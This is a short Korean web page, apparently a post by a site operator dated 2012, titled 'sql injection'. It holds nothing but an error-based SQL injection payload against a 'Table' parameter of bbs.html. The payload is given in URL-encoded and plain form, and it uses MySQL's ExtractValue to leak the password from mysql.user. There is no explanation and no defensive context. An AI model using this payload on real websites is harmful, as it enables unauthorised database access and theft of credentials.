sql injection

운영자

| 기사입력 2012/11/26 [03:13]

sql injection

운영자

ㅣ 기사입력

2012/11/26 [03:13]

========================================================================
/bbs.html?Table=mysql.user%20where%28SELECT%201%20AND%20ExtractValue%281,%20CONCAT%280x5c,%28SELECT%20password%20from%20mysql.user%20limit%200,1%29%29%29%29--
========================================================================

========================================================================
bbs.html?Table=mysql.user where(SELECT 1 AND ExtractValue(1, CONCAT(0x5c,(SELECT password from mysql.user limit 0,1))))

=========================================================================